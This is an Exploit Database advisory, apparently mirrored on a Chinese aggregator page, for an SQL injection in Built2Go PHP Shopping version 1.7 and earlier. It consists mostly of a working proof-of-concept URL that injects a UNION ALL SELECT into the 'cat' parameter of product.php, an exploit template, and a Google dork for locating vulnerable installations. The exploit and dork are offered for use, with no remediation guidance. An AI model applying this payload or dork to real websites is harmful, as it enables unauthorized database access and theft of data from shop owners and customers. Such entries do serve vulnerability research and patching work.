Built2Go PHP Shopping – SQL Injection

• Exploit Database
• 12 阅读

• 作者： Br0ly
  日期： 2010-12-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15811/

• Script Name: Built2Go PHP Shopping( version ) <= 1.7
  Site: http://built2go.com/
  Script Demo: http://demos.built2go.com/shopping/1/
  Found: Br0ly
  Google Dork: "Powered by Built2Go PHP Shopping"
  
  p0c:
  
  http://server.com/product.php?cat=16'%20UNION%20ALL%20SELECT%201,@@version,3/*
  
  xPloit:
  
  http://server.com/product.php?cat=[sqli]
  
  Brazil ;D